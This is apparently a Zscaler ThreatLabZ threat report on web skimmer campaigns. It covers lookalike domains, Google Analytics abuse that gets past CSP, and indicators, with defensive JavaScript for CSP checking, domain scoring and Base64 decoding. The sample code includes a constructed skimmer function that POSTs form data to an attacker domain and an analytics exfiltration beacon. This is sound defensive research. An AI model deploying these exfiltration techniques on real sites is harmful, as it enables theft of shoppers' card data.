Skimmer groups are growing rapidly and targeting a range of e-commerce platforms, using a variety of techniques to avoid detection. The Zscaler ThreatLabZ research team has been tracking these skimmer groups and monitoring the techniques they use.
Figure 1: Hits on compromised sites over 90 days
Historically, the Magento platform has been the most heavily targeted in skimmer attacks. This trend continues, with significant spikes in attacks against other e-commerce platforms as well.
Figure 2: Different e-commerce platforms targeted during the past two months.
Newly registered domains (NRDs) in skimmer attacks
Figure 3: Trend for newly registered domains lexically close to legitimate services.
URL categorization of targeted websites
Websites in the shopping category are the most common targets for skimmer attacks, but other URL categories have also fallen victim to these attacks, as shown in the following chart:
Figure 4: URL categories of impacted sites
Abusing legitimate communication and analytics services in skimmer attacks
Starting last year, we have seen skimmer groups abusing legitimate communication and analytics services, such as Telegram and Google Analytics, for data exfiltration. Some of these skimmer techniques can be defeated by configuring a Content Security Policy (CSP). CSP is an added layer of web security, delivered as an HTTP response header (or a meta tag), that helps detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement to malware distribution.
By configuring CSP, web admins can specify which domains are valid sources for scripts (script-src) and valid destinations for outbound requests (connect-src). Such a policy can still be bypassed when it allows the Google Analytics endpoint, which a large number of websites use legitimately: CSP matches on the origin of a request, not on the tracking ID inside it, so a skimmer can post stolen form data to the analytics collection endpoint under an attacker-owned tracking ID, and the policy cannot distinguish that beacon from the site's own analytics traffic.
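To make the connect-src point concrete, the following is an added example (not code from Zscaler or from any skimmer): a small CSP evaluator implementing a subset of CSP source matching (scheme-source, host-source with an optional leading wildcard, port and path prefix, 'self', 'none'), run against a constructed shop policy. The page origin, the policy, the placeholder tracking ID and the URLs are all assumptions.

```javascript
// Added example, not code from Zscaler or from any skimmer: a minimal
// Content-Security-Policy evaluator that shows why a policy allowing the
// Google Analytics origin for connections also lets a skimmer exfiltrate
// through that same origin. Implements a subset of CSP source matching
// (scheme-source, host-source with optional leading wildcard, port and
// path prefix, 'self', 'none'); nonce-, hash- and 'unsafe-*' sources are
// never treated as a match. Page origin, policy and URLs are constructed.

function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function hostMatches(pattern, host) {
  if (pattern === '*') return true;
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1);                // "*.example.com" -> ".example.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === pageOrigin;
  if (s.startsWith("'")) return false;             // 'unsafe-inline', 'nonce-...', 'sha256-...'
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;   // scheme-source, e.g. "https:"
  // host-source: [scheme://]host[:port][/path]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)(?::(\d+|\*))?(\/[^?#]*)?$/.exec(s);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  if (scheme && `${scheme}:` !== url.protocol) return false;
  if (!hostMatches(host, url.hostname)) return false;
  const urlPort = url.port || (url.protocol === 'https:' ? '443' : '80');
  if (port && port !== '*' && port !== urlPort) return false;
  // CSP path matching: a trailing "/" means prefix match, otherwise exact match
  if (path && (path.endsWith('/') ? !url.pathname.startsWith(path) : url.pathname !== path)) return false;
  return true;
}

// Would the page be allowed to send a request (fetch/XHR/beacon) to targetUrl?
function connectAllowed(cspHeader, targetUrl, pageOrigin) {
  const policy = parseCsp(cspHeader);
  const sources = policy['connect-src'] || policy['default-src'];
  if (!sources) return true;                       // no governing directive: unrestricted
  const url = new URL(targetUrl);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// Constructed scenario: a shop that uses Google Analytics and locks
// everything else down to its own origin.
const PAGE_ORIGIN = 'https://shop.example';
const SHOP_CSP =
  "default-src 'self'; script-src 'self' https://www.google-analytics.com; " +
  "connect-src 'self' https://www.google-analytics.com";

// Skimmer beacon to the analytics collect endpoint with an attacker-owned
// tracking ID (placeholder value) carrying the stolen form data in an event field.
const EXFIL_VIA_GA =
  'https://www.google-analytics.com/collect?v=1&tid=UA-00000000-1&t=event&ec=f&ea=ENCODED_FORM_DATA';
// The same data sent to an attacker-registered domain (name taken from Case 1 below).
const EXFIL_DIRECT = 'https://cdn-cgi.net/collect';

function demo() {
  return {
    analyticsBeaconAllowed: connectAllowed(SHOP_CSP, EXFIL_VIA_GA, PAGE_ORIGIN), // true: CSP only sees the origin
    attackerDomainBlocked: !connectAllowed(SHOP_CSP, EXFIL_DIRECT, PAGE_ORIGIN), // true
  };
}
```

The result of demo() is the whole problem in one line: the direct beacon to the attacker's domain is blocked, but the beacon to the analytics origin passes because CSP has no way to express "only our tracking ID". The practical mitigations are outside CSP: loading the analytics snippet from a first-party proxy, monitoring outbound beacons for unexpected tracking IDs, and Subresource Integrity on every script the checkout page loads.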
ThreatLabZ observed a significant spike during February and March 2021 in such attacks, where legitimate communication and analytics services are abused, but they have trailed off in recent weeks.
Figure 5: Hits of skimmer groups abusing legitimate services over 90 days.
Recent skimmer activity
Recent skimmer attacks have heavily leveraged NRDs for malicious script injection and data exfiltration, as well as the use of compromised third-party scripts or CDNs. Below are two examples of recent skimmer attacks using NRDs and CDNs to serve content to specific websites.
Case 1: In one of the skimmer attacks, we observed two NRDs involved: one for injecting the malicious skimmer code and the other for data exfiltration. These domains are lexically similar to the keywords jquery and CDN, which helps the attack blend into legitimate traffic and remain undetected.
Skimmer Domain: jquery-ui[.]net
Creation Date: 2021-04-18
Data Exfiltration Domain: cdn-cgi[.]net
Creation Date: 2021-04-11
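The following is an added example (not Zscaler's tooling) of the kind of heuristic an analyst would use to triage domains like the two above: flag a domain that is newly registered, that embeds the name of a library or service every shop loads, or whose label is within a small edit distance of a real hostname. The keyword and allowlist contents, the thresholds and the "as of" date are assumptions for illustration; the creation dates for the Case 1 domains are the ones listed above.

```javascript
// Added example, not Zscaler's tooling: score a domain on three signals
// described in the text (recently registered, built from a brand/library
// keyword, lexically close to a legitimate label). Lists, thresholds and
// the "as of" date are assumptions for illustration only.

const BRAND_KEYWORDS = ['jquery', 'cdn', 'google', 'ajax', 'analytics', 'cloudflare'];
const LEGIT_LABELS = ['jquery', 'jqueryui', 'cdnjs', 'google', 'google-analytics',
  'googletagmanager', 'cloudflare'];
const ALLOWLIST = new Set(['jquery.com', 'jqueryui.com', 'code.jquery.com',
  'cdnjs.cloudflare.com', 'google-analytics.com', 'googletagmanager.com', 'cloudflare.com']);

// Standard edit distance (insert/delete/substitute), two-row DP.
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Second-level label ("jquery-ui" for jquery-ui.net). Naive on purpose:
// it ignores public suffixes such as co.uk (assumption to keep this short).
function secondLevelLabel(domain) {
  const parts = domain.split('.');
  return parts.length >= 2 ? parts[parts.length - 2] : parts[0];
}

// createdIso may be null when the registration date is unknown.
function scoreDomain(domain, createdIso, asOfIso, maxAgeDays = 30) {
  const d = domain.toLowerCase().replace(/\[\.\]/g, '.');     // accept defanged input
  if (ALLOWLIST.has(d)) return { domain: d, score: 0, reasons: ['allowlisted'] };
  const reasons = [];

  if (createdIso) {
    const ageDays = (Date.parse(asOfIso) - Date.parse(createdIso)) / 86400000;
    if (ageDays <= maxAgeDays) reasons.push(`registered ${Math.round(ageDays)} days ago`);
  }

  const label = secondLevelLabel(d);
  const kw = BRAND_KEYWORDS.find((k) => label.includes(k));
  if (kw) reasons.push(`label contains "${kw}"`);

  // Lexical closeness: compare hyphen-stripped labels and keep the best match.
  const bare = label.replace(/-/g, '');
  let best = null;
  for (const legit of LEGIT_LABELS) {
    const dist = levenshtein(bare, legit.replace(/-/g, ''));
    if (best === null || dist < best.dist) best = { legit, dist };
  }
  if (best.dist <= 2) reasons.push(`"${label}" is ${best.dist} edit(s) from "${best.legit}"`);

  return { domain: d, score: reasons.length, reasons };
}

// Constructed run over the Case 1 domains; 2021-05-04 is an assumed analysis date.
function triageCase1(asOf = '2021-05-04') {
  return [
    scoreDomain('jquery-ui[.]net', '2021-04-18', asOf),   // score 3
    scoreDomain('cdn-cgi[.]net', '2021-04-11', asOf),     // score 2
    scoreDomain('jqueryui.com', '2010-01-01', asOf),      // score 0, allowlisted
  ];
}
```

A score of 2 or more is a reasonable "look at this" threshold for a reputation engine that otherwise has nothing on the domain; the point of combining the signals is that domain age alone is noisy (every new shop is an NRD), while a fresh domain that also imitates jquery or a CDN is rarely innocent.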
Figure 6: Obfuscated skimmer script.
The skimmer script contains a Base64-encoded fake payment page, and the skimmed data is sent to the attacker-controlled domain.
Figure 7: Data exfiltration domain and Base64-encoded fake payment page.
Currently, both of these NRDs resolve to the same IP address, 34.125.186[.]248, which hosts multiple other (possible) skimmer domains lexically close to legitimate services.
Figure 8: Multiple possible skimmer domains resolving to the same IP address. (Source: RiskIQ)
In the recent past, these domains resolved to the following IP addresses, each of which hosted newly registered domains lexically close to legitimate domains and possibly connected to skimmer attacks.
Figure 9: Suspicious IP addresses related to these domains. (Source: RiskIQ)
During our analysis of the above-mentioned IP addresses and domains, we observed that the domain ajaxtracker[.]com resolved to IP address 34.125.186[.]248 from April 26, 2021, to April 29, 2021, and during that window it was connected to Raccoon Stealer.
Figure 10: Malicious skimmer script.
Figure 11: Function to grab all the inputs provided by the victim.
The Default_send function collects the URL of the infected page and grabs all the inputs provided by the victim shopping on the compromised website.
Figure 12: Function to send victim’s card details to attacker.
Once the script has collected the data, it calls the SendData function, which holds the target URL to which the collected data is uploaded. The URL is stored in Base64-encoded form inside SendData, as displayed below.
Figure 13: Base64 encoded data exfiltration domain.
Decoding the Base64 string shows that the data was being exfiltrated to the malicious domain google-sanek[.]com.
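Both the Base64-encoded fake payment page in Case 1 and the Base64-encoded exfiltration URL in SendData can be surfaced the same way: pull every Base64-looking token out of a script, decode it, and keep the ones that decode to a URL or to HTML. The following is an added example (not the skimmer's own code and not Zscaler's tooling) that does this. The script it scans is constructed to mimic the structure the figures describe (a SendData function with a Base64-encoded URL and a Base64-encoded form); the URL path, variable names and HTML fragment are assumptions, while the decoded domain is the one named above.

```javascript
// Added example, not the skimmer's own code: scan script text for Base64
// tokens, decode them, and report the ones that decode to a URL (the hidden
// exfiltration endpoint) or to HTML (an injected fake payment form).
// SAMPLE_SKIMMER is constructed to mimic the structure the figures describe;
// its path, variable names and HTML fragment are assumptions.

const SAMPLE_SKIMMER = `
function SendData(d) {
  var u = atob("aHR0cHM6Ly9nb29nbGUtc2FuZWsuY29t") + "/p.php";
  var x = new XMLHttpRequest(); x.open("POST", u, true); x.send(d);
}
var form = atob("PGZvcm0+PC9mb3JtPg==");
var sessionKey = "abcdef1234567890";
`;

// Candidate tokens: Base64 alphabet, at least 16 characters, optional padding.
const B64_TOKEN = /[A-Za-z0-9+\/]{16,}={0,2}/g;

function isPrintableAscii(str) {
  return [...str].every((ch) => {
    const c = ch.charCodeAt(0);
    return (c >= 0x20 && c <= 0x7e) || c === 0x0a || c === 0x0d || c === 0x09;
  });
}

function classify(decoded) {
  if (/^https?:\/\//i.test(decoded)) return 'url';
  if (/^\s*</.test(decoded)) return 'html';
  return 'text';
}

// Returns one record per token that decodes to readable ASCII:
// { encoded, decoded, kind, host? }, in order of appearance.
function findEncodedArtifacts(script) {
  const hits = [];
  for (const token of script.match(B64_TOKEN) || []) {
    if (token.length % 4 !== 0) continue;                     // not a complete Base64 blob
    const decoded = Buffer.from(token, 'base64').toString('latin1');
    if (!isPrintableAscii(decoded)) continue;                 // identifiers and keys decode to noise
    const kind = classify(decoded);
    const hit = { encoded: token, decoded, kind };
    if (kind === 'url') hit.host = new URL(decoded).hostname; // the exfiltration domain
    hits.push(hit);
  }
  return hits;
}

// Convenience: just the exfiltration hosts, which is what goes on a blocklist.
function exfilHosts(script) {
  return findEncodedArtifacts(script).filter((h) => h.kind === 'url').map((h) => h.host);
}
```

Run over SAMPLE_SKIMMER this reports two artifacts: the URL https://google-sanek.com (the SendData destination) and the HTML fragment <form></form> (the fake form), while the 16-character sessionKey value is dropped because it decodes to non-printable bytes. The length and printability filters are what keep this usable on real, minified pages, where long identifiers and hex strings would otherwise flood the output.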
Skimmer groups continue to infect e-commerce sites in large numbers and keep improving their techniques to remain undetected. The use of newly registered domains lexically close to legitimate domains or services helps attackers evade reputation-based engines, because their domains are too new to have earned a poor reputation. Buyers are always advised to shop only at known and legitimate e-commerce stores. Zscaler ThreatLabZ actively tracks malicious campaigns and protects customers from skimming and other types of data-stealing attacks.